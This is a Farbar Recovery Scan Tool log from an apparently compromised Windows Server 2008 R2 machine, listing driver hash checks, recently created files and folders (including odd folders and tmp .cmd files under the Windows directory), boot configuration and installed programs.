C:\Windows\system32\drivers\lsi_sas.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_sas2.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_scsi.sys ==> MD5 is legit
C:\Windows\system32\drivers\luafv.sys ==> MD5 is legit
C:\Windows\system32\drivers\megasas.sys ==> MD5 is legit
C:\Windows\system32\drivers\MegaSR.sys ==> MD5 is legit
C:\Windows\System32\drivers\modem.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\monitor.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mouclass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mouhid.sys ==> MD5 is legit
C:\Windows\System32\drivers\mountmgr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\MpFilter.sys ==> MD5 is legit
C:\Windows\system32\drivers\mpio.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\MpNWMon.sys ==> MD5 is legit
C:\Windows\System32\drivers\mpsdrv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mrxsmb.sys A5D9106A73DC88564C825D317CAC68AC
C:\Windows\System32\DRIVERS\mrxsmb10.sys D711B3C1D5F42C0C2415687BE09FC163
C:\Windows\System32\DRIVERS\mrxsmb20.sys 9423E9D355C8D303E76B8CFBD8A5C30C
C:\Windows\system32\drivers\msahci.sys ==> MD5 is legit
C:\Windows\system32\drivers\msdsm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Msfs.sys ==> MD5 is legit
C:\Windows\System32\drivers\mshidkmdf.sys ==> MD5 is legit
C:\Windows\System32\drivers\msisadrv.sys ==> MD5 is legit
C:\Windows\System32\Drivers\MsRPC.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mssmbios.sys ==> MD5 is legit
C:\Windows\system32\drivers\MTConfig.sys ==> MD5 is legit
C:\Windows\System32\Drivers\mup.sys ==> MD5 is legit
C:\Windows\System32\drivers\ndis.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndiscap.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndistapi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndisuio.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndiswan.sys ==> MD5 is legit
C:\Windows\System32\Drivers\NDProxy.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\netbios.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\netbt.sys ==> MD5 is legit
C:\Windows\system32\drivers\nfrd960.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\NisDrvWFP.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Npfs.sys ==> MD5 is legit
C:\Windows\System32\drivers\nsiproxy.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Ntfs.sys B98F8C6E31CD07B2E6F71F7F648E38C0
C:\Windows\System32\Drivers\Null.sys ==> MD5 is legit
C:\Windows\system32\drivers\nvraid.sys ==> MD5 is legit
C:\Windows\system32\drivers\nvstor.sys ==> MD5 is legit
C:\Windows\system32\drivers\nv_agp.sys ==> MD5 is legit
C:\Windows\system32\drivers\ohci1394.sys ==> MD5 is legit
C:\Windows\system32\drivers\parport.sys ==> MD5 is legit
C:\Windows\System32\drivers\partmgr.sys E9766131EEADE40A27DC27D2D68FBA9C
C:\Windows\System32\drivers\passthruparser.sys 201685812EABAB0FB7914455C21C90DA
C:\Windows\System32\drivers\pci.sys ==> MD5 is legit
C:\Windows\System32\drivers\pciide.sys ==> MD5 is legit
C:\Windows\system32\drivers\pcmcia.sys ==> MD5 is legit
C:\Windows\System32\drivers\pcw.sys ==> MD5 is legit
C:\Windows\System32\drivers\peauth.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\raspptp.sys ==> MD5 is legit
C:\Windows\system32\drivers\processr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\pacer.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\b57nd60a.sys C1E625A71A82226FA39C1296C5940291
C:\Windows\system32\drivers\ql2300.sys ==> MD5 is legit
C:\Windows\system32\drivers\ql40xx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasacd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\AgileVpn.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasl2tp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\raspppoe.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rassstp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdbss.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdpbus.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\RDPCDD.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpdr.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpencdd.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdprefmp.sys ==> MD5 is legit
C:\Windows\System32\Drivers\RDPWD.sys E61608AA35E98999AF9AAEEEA6114B0A
C:\Windows\System32\DRIVERS\rspndr.sys ==> MD5 is legit
C:\Windows\system32\drivers\vms3cap.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\sacdrv.sys D65E5E5C59F70516E856F5350106CDAB
C:\Windows\system32\drivers\sbp2port.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\scfilter.sys ==> MD5 is legit
C:\Windows\System32\Drivers\secdrv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\serenum.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\serial.sys ==> MD5 is legit
C:\Windows\system32\drivers\sermouse.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffdisk.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_mmc.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_sd.sys ==> MD5 is legit
C:\Windows\system32\drivers\sfloppy.sys ==> MD5 is legit
C:\Windows\system32\drivers\SiSRaid2.sys ==> MD5 is legit
C:\Windows\system32\drivers\sisraid4.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\smb.sys ==> MD5 is legit
C:\Windows\System32\Drivers\spldr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\srv.sys 441FBA48BFF01FDB9D5969EBC1838F0B
C:\Windows\System32\DRIVERS\srv2.sys B4ADEBBF5E3677CCE9651E0F01F7CC28
C:\Windows\System32\DRIVERS\srvnet.sys 27E461F0BE5BFF5FC737328F749538C3
C:\Windows\system32\drivers\stexstor.sys ==> MD5 is legit
C:\Windows\System32\drivers\vmstorfl.sys ==> MD5 is legit
C:\Windows\system32\drivers\storvsc.sys ==> MD5 is legit
C:\Windows\system32\drivers\storvsp.sys FC0C1B9FCBD88266CA295A3F728B6D35
C:\Windows\System32\DRIVERS\swenum.sys ==> MD5 is legit
C:\Windows\System32\drivers\tcpip.sys DB74544B75566C974815E79A62433F29
C:\Windows\System32\DRIVERS\tcpip.sys DB74544B75566C974815E79A62433F29
C:\Windows\System32\drivers\tcpipreg.sys ==> MD5 is legit
C:\Windows\System32\drivers\tdpipe.sys ==> MD5 is legit
C:\Windows\System32\drivers\tdtcp.sys 51C5ECEB1CDEE2468A1748BE550CFBC8
C:\Windows\System32\DRIVERS\tdx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\termdd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\tssecsrv.sys 4CE278FC9671BA81A138D70823FCAA09
C:\Windows\System32\drivers\tsusbflt.sys ==> MD5 is legit
C:\Windows\system32\drivers\TsUsbGD.sys 9CC2CCAE8A84820EAECB886D477CBCB8
C:\Windows\System32\DRIVERS\tunnel.sys ==> MD5 is legit
C:\Windows\system32\drivers\uagp35.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\udfs.sys ==> MD5 is legit
C:\Windows\system32\drivers\uliagpkx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\umbus.sys ==> MD5 is legit
C:\Windows\system32\drivers\umpass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbccgp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbehci.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbhub.sys ==> MD5 is legit
C:\Windows\system32\drivers\usbohci.sys ==> MD5 is legit
C:\Windows\system32\drivers\usbprint.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\USBSTOR.SYS ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbuhci.sys ==> MD5 is legit
C:\Windows\System32\drivers\vdrvroot.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vgapnp.sys ==> MD5 is legit
C:\Windows\System32\drivers\vga.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vhdmp.sys ==> MD5 is legit
C:\Windows\System32\drivers\vhdparser.sys F59490F45EF1F4733CDBBF5B4B2F6950
C:\Windows\system32\drivers\viaide.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\Vid.sys 1720D283BDB1EAA7F21976586FF52B95
C:\Windows\system32\drivers\vmbus.sys 80E731A278695B47345D0171A19E428B
C:\Windows\system32\drivers\VMBusHID.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vmswitch.sys 3BAFE9FF545609476D14D277C09F6922
C:\Windows\System32\DRIVERS\vmswitch.sys 3BAFE9FF545609476D14D277C09F6922
C:\Windows\System32\drivers\volmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\volmgrx.sys ==> MD5 is legit
C:\Windows\System32\drivers\volsnap.sys ==> MD5 is legit
C:\Windows\system32\drivers\vsmraid.sys ==> MD5 is legit
C:\Windows\system32\drivers\wacompen.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\system32\drivers\wd.sys ==> MD5 is legit
C:\Windows\System32\drivers\Wdf01000.sys E2C933EDBC389386EBE6D2BA953F43D8
C:\Windows\System32\DRIVERS\wfplwf.sys ==> MD5 is legit
C:\Windows\System32\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\SysWOW64\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\system32\drivers\wmiacpi.sys ==> MD5 is legit
C:\Windows\system32\drivers\ws2ifsl.sys ==> MD5 is legit
C:\Windows\System32\drivers\WudfPf.sys ==> MD5 is legit

==================== NetSvcs (Whitelisted) ===================

NETSVC: sacsvr -> C:\Windows\system32\sacsvr.dll (Microsoft Corporation)

==================== One Month Created Files and Folders ========

2014-02-24 09:53 - 2014-02-24 09:53 - 00022993 _____ () C:\Users\administrator.COMPANY\Desktop\FRST.txt
2014-02-24 09:52 - 2014-02-24 09:52 - 00000000 ____D () C:\Users\administrator.COMPANY\Desktop\FRST-OlderVersion
2014-02-24 09:41 - 2014-02-24 09:53 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Local\Temp\2
2014-02-23 13:55 - 2014-02-23 13:55 - 00000894 _____ () C:\Windows\SysWOW64\tmp65.cmd
2014-02-23 13:52 - 2014-02-23 13:52 - 00000034 _____ () C:\Windows\SysWOW64\tmp64.cmd
2014-02-23 13:45 - 2014-02-23 13:45 - 00001352 _____ () C:\Windows\SysWOW64\tmp63.cmd
2014-02-23 13:38 - 2014-02-23 13:38 - 00001380 _____ () C:\Windows\SysWOW64\tmp61.cmd
2014-02-22 19:34 - 2014-02-22 19:34 - 00000034 _____ () C:\Windows\SysWOW64\tmp57.cmd
2014-02-22 19:21 - 2014-02-22 19:21 - 00001380 _____ () C:\Windows\SysWOW64\tmp54.cmd
2014-02-22 19:04 - 2014-02-22 19:04 - 00000034 _____ () C:\Windows\SysWOW64\tmp50.cmd
2014-02-22 18:50 - 2014-02-22 18:50 - 00001380 _____ () C:\Windows\SysWOW64\tmp47.cmd
2014-02-22 02:16 - 2014-02-22 02:12 - 01150280 _____ (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\F3C0.tmp
2014-02-21 18:14 - 2014-02-21 18:14 - 00000034 _____ () C:\Windows\SysWOW64\tmp43.cmd
2014-02-21 18:00 - 2014-02-21 18:00 - 00001380 _____ () C:\Windows\SysWOW64\tmp40.cmd
2014-02-19 09:35 - 2014-02-24 09:52 - 02155520 _____ (Farbar) C:\Users\administrator.COMPANY\Desktop\FRST64.exe
2014-02-18 19:55 - 2014-02-23 13:55 - 00000000 ____D () C:\Windows\tanechka
2014-02-18 19:44 - 2014-02-23 13:45 - 00000000 ____D () C:\Windows\mtc
2014-02-18 19:41 - 2014-02-23 13:42 - 00000000 ____D () C:\Windows\pts
2014-02-18 19:38 - 2014-02-23 13:42 - 00000000 ____D () C:\Windows\ric
2014-02-15 14:23 - 2014-02-17 17:14 - 00000000 ____D () C:\Windows\ric_
2014-02-12 14:51 - 2014-02-12 14:51 - 00050740 _____ () C:\Users\administrator.COMPANY\Desktop\Extras.Txt
2014-02-12 14:50 - 2014-02-12 14:50 - 00060036 _____ () C:\Users\administrator.COMPANY\Desktop\OTL.Txt
2014-02-12 14:47 - 2014-02-12 14:47 - 00602112 _____ (OldTimer Tools) C:\Users\administrator.COMPANY\Desktop\OTL.exe
2014-02-11 01:07 - 2014-02-11 01:07 - 00847752 ____T (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\goopdate.dll85b32115
2014-02-07 15:04 - 2014-02-17 17:22 - 00000000 ____D () C:\Windows\mtc_
2014-02-07 14:57 - 2014-02-17 17:18 - 00000000 ____D () C:\Windows\pts_
2014-02-07 14:45 - 2014-02-15 09:21 - 00000000 ____D () C:\Windows\xpm_
2014-02-07 14:42 - 2014-02-18 02:29 - 00000000 ____D () C:\Windows\tanechka_
2014-02-05 11:04 - 2014-02-05 11:04 - 04380160 _____ () C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
2014-02-05 09:53 - 2014-02-24 09:53 - 00000000 ____D () C:\FRST
2014-01-29 14:03 - 2014-01-29 14:03 - 00119000 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-01-29 14:03 - 2014-01-29 14:03 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-01-29 09:39 - 2014-01-29 09:39 - 00001105 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-01-29 09:38 - 2014-01-29 09:39 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-29 09:38 - 2013-04-04 14:50 - 00025928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-01-29 09:34 - 2014-01-29 09:34 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Security Client
2014-01-26 19:47 - 2014-02-14 13:59 - 00001990 ____H () C:\Users\administrator.COMPANY\Documents\Default.rdp
2014-01-26 03:02 - 2014-01-26 03:02 - 00001142 _____ () C:\Users\Administrator\AppData\Local\Temp\MpCmdRun.log
2014-01-26 03:01 - 2014-01-29 10:47 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Temp\{FCE3A33B-4372-4641-8EDD-96B2A575AD29}
2014-01-26 02:56 - 2014-01-26 02:56 - 00116648 ____T (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\GoogleUpdate.exe85b320c7
2014-01-26 02:56 - 2014-01-26 02:56 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Macromedia
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\SysWOW64\Macromed
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\system32\Macromed

==================== One Month Modified Files and Folders =======

2014-02-24 09:53 - 2014-02-24 09:53 - 00022993 _____ () C:\Users\administrator.COMPANY\Desktop\FRST.txt
2014-02-24 09:53 - 2014-02-24 09:41 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Local\Temp\2
2014-02-24 09:53 - 2014-02-05 09:53 - 00000000 ____D () C:\FRST
2014-02-24 09:52 - 2014-02-24 09:52 - 00000000 ____D () C:\Users\administrator.COMPANY\Desktop\FRST-OlderVersion
2014-02-24 09:52 - 2014-02-19 09:35 - 02155520 _____ (Farbar) C:\Users\administrator.COMPANY\Desktop\FRST64.exe
2014-02-24 09:52 - 2014-01-20 15:13 - 00000936 _____ () C:\Users\administrator.COMPANY\AppData\Local\Temp\chrome_installer.log
2014-02-24 09:52 - 2013-12-04 19:53 - 00000000 ____D () C:\Program Files (x86)\Google
2014-02-24 09:48 - 2013-11-30 11:20 - 01740719 _____ () C:\Windows\WindowsUpdate.log
2014-02-24 09:47 - 2009-07-14 05:49 - 00021328 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-02-24 09:47 - 2009-07-14 05:49 - 00021328 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-02-24 09:41 - 2013-12-01 10:23 - 00000136 _____ () C:\Windows\system32\config\netlogon.ftl
2014-02-23 13:59 - 2013-12-07 07:20 - 00008582 _____ () C:\Windows\SysWOW64\sclient.log
2014-02-23 13:55 - 2014-02-23 13:55 - 00000894 _____ () C:\Windows\SysWOW64\tmp65.cmd
2014-02-23 13:55 - 2014-02-18 19:55 - 00000000 ____D () C:\Windows\tanechka
2014-02-23 13:52 - 2014-02-23 13:52 - 00000034 _____ () C:\Windows\SysWOW64\tmp64.cmd
2014-02-23 13:45 - 2014-02-23 13:45 - 00001352 _____ () C:\Windows\SysWOW64\tmp63.cmd
2014-02-23 13:45 - 2014-02-18 19:44 - 00000000 ____D () C:\Windows\mtc
2014-02-23 13:42 - 2014-02-18 19:41 - 00000000 ____D () C:\Windows\pts
2014-02-23 13:42 - 2014-02-18 19:38 - 00000000 ____D () C:\Windows\ric
2014-02-23 13:38 - 2014-02-23 13:38 - 00001380 _____ () C:\Windows\SysWOW64\tmp61.cmd
2014-02-22 19:34 - 2014-02-22 19:34 - 00000034 _____ () C:\Windows\SysWOW64\tmp57.cmd
2014-02-22 19:21 - 2014-02-22 19:21 - 00001380 _____ () C:\Windows\SysWOW64\tmp54.cmd
2014-02-22 19:04 - 2014-02-22 19:04 - 00000034 _____ () C:\Windows\SysWOW64\tmp50.cmd
2014-02-22 18:50 - 2014-02-22 18:50 - 00001380 _____ () C:\Windows\SysWOW64\tmp47.cmd
2014-02-22 02:12 - 2014-02-22 02:16 - 01150280 _____ (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\F3C0.tmp
2014-02-21 18:14 - 2014-02-21 18:14 - 00000034 _____ () C:\Windows\SysWOW64\tmp43.cmd
2014-02-21 18:00 - 2014-02-21 18:00 - 00001380 _____ () C:\Windows\SysWOW64\tmp40.cmd
2014-02-18 02:29 - 2014-02-07 14:42 - 00000000 ____D () C:\Windows\tanechka_
2014-02-17 17:22 - 2014-02-07 15:04 - 00000000 ____D () C:\Windows\mtc_
2014-02-17 17:18 - 2014-02-07 14:57 - 00000000 ____D () C:\Windows\pts_
2014-02-17 17:14 - 2014-02-15 14:23 - 00000000 ____D () C:\Windows\ric_
2014-02-15 09:21 - 2014-02-07 14:45 - 00000000 ____D () C:\Windows\xpm_
2014-02-14 13:59 - 2014-01-26 19:47 - 00001990 ____H () C:\Users\administrator.COMPANY\Documents\Default.rdp
2014-02-12 14:51 - 2014-02-12 14:51 - 00050740 _____ () C:\Users\administrator.COMPANY\Desktop\Extras.Txt
2014-02-12 14:50 - 2014-02-12 14:50 - 00060036 _____ () C:\Users\administrator.COMPANY\Desktop\OTL.Txt
2014-02-12 14:47 - 2014-02-12 14:47 - 00602112 _____ (OldTimer Tools) C:\Users\administrator.COMPANY\Desktop\OTL.exe
2014-02-11 01:07 - 2014-02-11 01:07 - 00847752 ____T (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\goopdate.dll85b32115
2014-02-05 11:04 - 2014-02-05 11:04 - 04380160 _____ () C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
2014-02-05 10:07 - 2013-11-18 09:28 - 04121952 _____ (Kaspersky Lab ZAO) C:\Users\administrator.COMPANY\Desktop\TDSSKiller.exe
2014-01-29 14:08 - 2014-01-23 11:36 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-01-29 14:03 - 2014-01-29 14:03 - 00119000 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-01-29 14:03 - 2014-01-29 14:03 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-01-29 10:56 - 2009-07-14 06:10 - 00694294 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-01-29 10:49 - 2013-11-30 11:29 - 25804800 _____ () C:\Windows\system32\vmguest.iso
2014-01-29 10:47 - 2014-01-26 03:01 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Temp\{FCE3A33B-4372-4641-8EDD-96B2A575AD29}
2014-01-29 10:47 - 2010-11-21 04:47 - 00004430 _____ () C:\Windows\PFRO.log
2014-01-29 10:47 - 2009-07-14 06:06 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-01-29 09:39 - 2014-01-29 09:39 - 00001105 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-01-29 09:39 - 2014-01-29 09:38 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-29 09:34 - 2014-01-29 09:34 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
2014-01-29 09:34 - 2014-01-23 11:08 - 00000000 ____D () C:\AdwCleaner
2014-01-29 09:31 - 2014-01-23 12:08 - 00000000 ____D () C:\Program Files\ThreatExpert Memory Scanner
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Security Client
2014-01-26 19:52 - 2014-01-20 15:16 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-01-26 19:52 - 2014-01-20 15:15 - 00707672 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-01-26 03:02 - 2014-01-26 03:02 - 00001142 _____ () C:\Users\Administrator\AppData\Local\Temp\MpCmdRun.log
2014-01-26 03:02 - 2009-07-14 04:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-01-26 02:56 - 2014-01-26 02:56 - 00116648 ____T (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\GoogleUpdate.exe85b320c7
2014-01-26 02:56 - 2014-01-26 02:56 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Macromedia
2014-01-26 02:56 - 2013-12-04 19:53 - 00018911 _____ () C:\Users\Administrator\AppData\Local\Temp\chrome_installer.log
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\SysWOW64\Macromed
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\system32\Macromed

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

==================== BCD ================================

Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=C:
description             Windows Boot Manager
locale                  en-US
inherit                 {globalsettings}
default                 {current}
resumeobject            {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 30

Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows Server 2008 R2
locale                  en-US
inherit                 {bootloadersettings}
recoverysequence        {131b1cf3-59f3-11e3-9a9e-18a9053c1a8b}
recoveryenabled         Yes
osdevice                partition=C:
systemroot              \Windows
resumeobject            {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
nx                      OptOut
hypervisorlaunchtype    Auto

Windows Boot Loader
-------------------
identifier              {131b1cf3-59f3-11e3-9a9e-18a9053c1a8b}
device                  ramdisk=[C:]\Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\Winre.wim,{131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[C:]\Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\Winre.wim,{131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
systemroot              \windows
nx                      OptIn
winpe                   Yes

Resume from Hibernate
---------------------
identifier              {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
filedevice              partition=C:
filepath                \hiberfil.sys
debugoptionenabled      No

Windows Memory Tester
---------------------
identifier              {memdiag}
device                  partition=C:
path                    \boot\memtest.exe
description             Windows Memory Diagnostic
locale                  en-US
inherit                 {globalsettings}
badmemoryaccess         Yes

EMS Settings
------------
identifier              {emssettings}
bootems                 Yes

Debugger Settings
-----------------
identifier              {dbgsettings}
debugtype               Serial
debugport               1
baudrate                115200

RAM Defects
-----------
identifier              {badmemory}

Global Settings
---------------
identifier              {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}

Boot Loader Settings
--------------------
identifier              {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}

Hypervisor Settings
-------------------
identifier              {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200

Resume Loader Settings
----------------------
identifier              {resumeloadersettings}
inherit                 {globalsettings}

Device options
--------------
identifier              {131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
description             Ramdisk Options
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\boot.sdi



LastRegBack: 2014-02-18 15:58

==================== End Of Log ============================

Addition.log:


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 23-02-2014 02
Ran by Administrator at 2014-02-24 09:53:30
Running from C:\Users\administrator.COMPANY\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================


==================== Installed Programs ======================

7-Zip 9.20 (HKLM-x32\...\{23170F69-40C1-2701-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Active Directory Management Pack Helper Object (HKLM\...\{3696BAB3-3B1B-42C3-8D46-1898E59E7C84}) (Version: 1.1.0 - Microsoft Corporation)
ATI Display Driver (HKLM\...\ATI Display Driver) (Version: 8.24.50.5-090623a-083726C-HP - )
Headless Server Registry Update (HKLM-x32\...\{4E5563B6-DE0A-4F3B-A5D6-15789FD12D9B}) (Version: 1.0.0.0 - Hewlett-Packard Company)
HP Array Configuration Utility (HKLM-x32\...\{74C48700-A6A7-4B3D-BD3A-C4E131CDD8E8}) (Version: 8.50.5.0 - Hewlett Packard Development Company, L.P.)
HP Array Configuration Utility CLI (HKLM-x32\...\{14A5045C-33EE-4596-AA69-8761611AE8EB}) (Version: 8.50.6.0 - Hewlett-Packard Development Company, L.P.)
HP Insight Diagnostics  Online Edition for Windows (HKLM\...\{DCEA910B-3269-4F5B-A915-D59293004751}) (Version: 8.5.0 - Hewlett-Packard Development Company, L.P.)
HP Insight Management Agents (HKLM\...\{B7B52204-2CC8-477A-9C7A-382C31070A62}) (Version: 8.50.0.0 - Hewlett-Packard Company)
HP Lights-Out Online Configuration Utility (HKLM\...\{2E97856A-345A-475D-913C-B8A78406BDF6}) (Version: 3.1.0.0 - Hewlett-Packard Development Company, L.P.)
HP ProLiant Integrated Management Log Viewer (HKLM\...\{CF222EB4-4EF7-40F4-A62B-A03E214C20DE}) (Version: 5.24.0.0 - Hewlett-Packard Company)
HP ProLiant PCI-express Power Management Update for Windows (HKLM-x32\...\{34D6E797-AA32-455D-8E65-4EBD1AC9DED7}) (Version: 1.3.0.0 - Hewlett-Packard Company)
HP ProLiant Remote Monitor Service (HKLM\...\{74D49383-7EF9-4FD3-B5B0-73CA22F51CE8}) (Version: 5.21.0.0 - Hewlett-Packard Company)
HP Smart Array SAS/SATA Event Notification Service (HKLM\...\{0F27A9B5-63FD-43DB-8230-FFE1E9CFE2C4}) (Version: 6.20.0.64 - Hewlett-Packard Development Company, L.P.)
HP System Management Homepage (HKLM-x32\...\{3C4DF0FD-95CF-4F7B-A816-97CEF616948F}) (Version: 6.1.0 - Hewlett-Packard Company)
HP Version Control Agent (HKLM-x32\...\{5A5F45AE-0250-4C34-9D89-F10BDDEE665F}) (Version: 6.1.0.842 - Hewlett Packard Development Company, L.P.)
Malwarebytes Anti-Malware version 1.75.0.1300 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
